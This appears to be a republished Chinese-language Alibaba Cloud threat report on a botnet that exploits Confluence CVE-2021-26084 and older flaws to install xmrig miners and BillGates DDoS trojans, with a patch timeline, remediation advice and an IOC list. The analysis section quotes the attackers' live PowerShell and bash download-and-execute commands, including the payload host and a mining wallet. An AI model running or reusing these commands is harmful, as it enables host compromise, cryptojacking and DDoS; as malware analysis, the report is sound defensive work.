天天看點
傳回

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

概述

近日,阿裡雲安全監測到利用Atlassian Confluence 遠端代碼執行漏洞傳播的僵屍網絡随PoC公布後攻擊與入侵量大幅上升,該僵屍網絡由N Day利用某微E-cology WorkflowServiceXml遠端代碼執行、Yapi Mock遠端指令執行漏洞、Hadoop Yarn未授權通路漏洞等方式攻擊,快速內建Atlassian Confluence 遠端代碼執行漏洞0 Day并在網際網路傳播,進而實作快速部署挖礦、DDoS後門遠控等功能,對主機、使用者資産危害極大。

阿裡雲安全持續對該僵屍網絡進行監控,發現近期傳播有所上升,提醒廣大使用者注意防護。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

傳播手段

僵屍網絡通過多種方式進行入侵,快速內建Atlassian Confluence 遠端代碼執行漏洞利用PoC進行傳播,最終在主機上下載下傳挖礦、DDoS木馬,如圖是傳播路徑。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

Att&CK階段分析

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

詳細分析

針對該僵屍網絡,已經通過E-cology WorkflowServiceXml遠端代碼執行、Yapi Mock遠端指令執行漏洞、Hadoop Yarn未授權通路漏洞、銳捷網關遠端指令執行漏洞等衆多曆史漏洞對雲上資産進行入侵,而Atlassian Confluence 遠端代碼執行漏洞出現後,該團夥進行了迅速的內建并傳播。雲上最早于2021年9月2日發現了該僵屍網絡的掃描與入侵行為,距離網際網路的PoC曝光僅過去一天的時間。如圖,僵屍網絡入侵Windows主機後通過Powershell腳本下載下傳xmrig挖礦木馬進行挖礦,入侵Linux主機後通過Bash腳本下載下傳Billgates DDoS木馬并運作。

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://213.202.230.103/xmrig.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr.com:5555 -u 47bWqjkXUKtK3ifA8jV4of3i766TUCBSvazFokWsQmujEMmQ1LVXnuoSg3TwdepXziCwZGxvcMQp8cyNtxo4dG43RCmM2Fi -p xwei      
bash -c cd /tmp;curl -O http://213.202.230.103/syn;wget http://213.202.230.103/syn;chmod 777 syn;./syn

該僵屍網絡入侵主機後不僅進行挖礦行為,同時傳播DDoS木馬,使主機變為殭屍電腦。如圖僵屍網絡的下載下傳源中包含了幾款不同的DDoS用戶端。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

針對這些檔案簡要分析如下。

bie.exe/ma.exe分析

bie.exe(md5: 343492b2184371ae20bdb855126faac5)、ma.exe(md5: 4b1246d6bff5180642623a414c63efeb)皆為Windows版Billgates,如圖包含了CC攻擊、TCP Flood、UDP Flood、ICMP Flood等。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

qu/quu分析

qu(md5: bb17226b0568eeab3929914a532c351e)是基于ARM平台的DDoS木馬,quu(md5: 8e764618b928d0e348d96dc2640e2d6b)是基于x86平台的DDoS木馬,如圖逆向分析發現二進制中包含了TCP_Flood、UDP_Flood、CC_Flood、SYN_Flood、DNS_Flood等衆多功能。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

近一步分析該DDoS屬于某DDoS系統的用戶端,其組成部分共分為三個部分,伺服器端為某DDoS.exe的平台,用戶端通過DDoS生成器進行生成不同平台的可執行程式,dat中包含可修改的多架構的用戶端。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

如圖通過填寫域名/IP可以生成不同平台下的用戶端,包含了Linux2.4和2.6版本,也包含了其IOT平台下的arm、mips、dd-wrt等版本,通過不同版本的生成可以入侵到不同系統中達到控制多平台的功能。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

通過如圖的伺服器端,可以控制用戶端(失陷主機)對目标發動SYN_Flood、UDP_Flood、TCP_Flood、CC_Flood等多種類型的攻擊。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

bie/syn/syna/synsi分析

bie(md5: 1983401b0c7c291247785d56c377baa6)、syn(md5: f1c238bbbaf447497a77cf951aab6c54)、syna(md5: 52ee1db0410a334aaacb401316f45046)、synsi(md5: 7e63f96ecd4a0c26c2100f4bca945781)都是BillGates DDoS木馬。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

25000.zip分析

通過雲上情報關聯213.202.230.103目錄下還挂載着25000.zip的檔案,經解壓為也為DDoS叢集,其功能和用法同上述“qu/quu分析”介紹的一緻,同時擁有生成器、伺服器端、用戶端,可以批量分發傳播用戶端,通過伺服器端對叢集進行管理,統一下發對目标發起的DDoS攻擊。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

虛拟更新檔解密

當軟體或應用程式出現漏洞後,官方通常通過更新檔方式來進行更新和防止利用。更新檔又分為熱更新檔和冷更新檔,熱更新檔通常不需要複位、重新開機應用程式,而冷更新檔需要複位或重新開機應用程式。為了業務能持續性的運作,企業應急時通常選擇熱更新檔進行線上修複,待業務低峰期時再進行冷更新檔修複。但無論冷、熱更新檔都需要直接對線上業務進行操作,如果操作不當可能引起不必要的業務中斷或應用程式奔潰,而且線上業務往往較複雜,多個元件互相依賴,牽一發可能動全身。另一方面衆多僵屍網絡快速內建0day的工程化能力越來越強,企業安全人員在這個時候處在兩難境遇。

雲防火牆通過監測僵屍網絡動态、網際網路PoC披露等衆多因素,能在小時級上線虛拟更新檔進行攔截防禦入侵行為,在網絡側保障業務穩定運作。以下是Atlassian Confluence遠端代碼執行漏洞響應時間線:

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC
  • 2021年08月26日,Atlassian官方釋出了Atlassian Confluence 遠端代碼執行漏洞通告,漏洞編号為CVE-2021-26084,漏洞等級:嚴重。
  • 2021年8月30日18時,阿裡雲雲防火牆捕獲Atlassian Confluence 遠端代碼執行漏洞在野利用,攻擊來源IP:1.53.11.xxx,IP歸屬地越南。
  • 2021年9月1日上午,Github公布其利用PoC。
  • 2021年9月1日10時,阿裡雲雲防火牆更新Atlassian Confluence 遠端代碼執行漏洞虛拟更新檔。
  • 2021年9月2日,發現該團夥利用Confluence遠端代碼執行漏洞進行入侵、傳播挖礦、DDoS木馬。

安全解決方案

1、依據官方通告中影響版本資訊,排查企業是否使用該版本并更新到安全版本,官方連結為:

https://www.atlassian.com/software/confluence/download-archives

。如果無法立即更新Confluence,可以參考官方給出的Mitigation對不同平台下的Confluence進行處理。

2、雲防火牆提供虛拟更新檔功能能有效的緩解、攔截針對Confluence遠端代碼執行漏洞的攻擊、入侵行為。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

3、針對已被入侵的企業客戶,雲防火牆失陷感覺子產品能夠有效發現失陷主機對外連接配接行為,并提供事件相關處理建議。

與時間賽跑,解密虛拟更新檔-面對快速內建0Nday的團夥如何防禦概述傳播手段詳細分析虛拟更新檔解密安全解決方案IOC

IOC

URL

http://213.202.230.103/syn http://213.202.230.103/syna http://213.202.230.103/synsi http://213.202.230.103/xmm http://213.202.230.103/mm.exe http://213.202.230.103/qunima.exe http://213.202.230.103/cao http://213.202.230.103/gan http://213.202.230.103/qusi http://213.202.230.103/rinima http://213.202.230.103/xmrig.exe http://213.202.230.103/xmrig http://213.202.230.103/s.cmd http://213.202.230.103/ma.exe http://213.202.230.103/Linux2.6 http://213.202.230.103/quu http://213.202.230.103/bie http://213.202.230.103/udp http://213.202.230.103/25000.zip

IP

213.202.230.103

MD5

bie: 1983401b0c7c291247785d56c377baa6 (ELF 32-bit)

bie.exe: 343492b2184371ae20bdb855126faac5 (PE32)

ma.exe: 4b1246d6bff5180642623a414c63efeb (PE32)

qu: bb17226b0568eeab3929914a532c351e (ELF 32-bit ARM)

quu: 8e764618b928d0e348d96dc2640e2d6b (ELF 32-bit Intel)

s.cmd: 5d2ceff006864e3e7a41aae345599290 (powershell)

syn: f1c238bbbaf447497a77cf951aab6c54 (ELF 32-bit)

syna: 52ee1db0410a334aaacb401316f45046 (ELF 32-bit)

synsi: 7e63f96ecd4a0c26c2100f4bca945781 (ELF 64-bit)

xmm: 7e6b1473161ca0267f05870d55a10d77 (xmrig ELF 64-bit)

xmrig.exe: 889d91ab9ef2ad48ad90a7fa87d3fc81 (xmrig PE32+)

C&C

204.44.93.54

300gsyn.it

雲安全 機器學習/深度學習 分布式計算 資源排程 安全 網絡協定 hadoop 物聯網 網絡安全 Windows windows關聯啟動協定 windows啟動指定的檔案協定 windows關聯指定的檔案協定 bigdl開源深度學習 yarn hadoop排程器
上一篇: 阿裡雲上部署MQTT代理伺服器MQTT伺服器部署
下一篇: 個體怎樣快速建立自己的站點?

繼續閱讀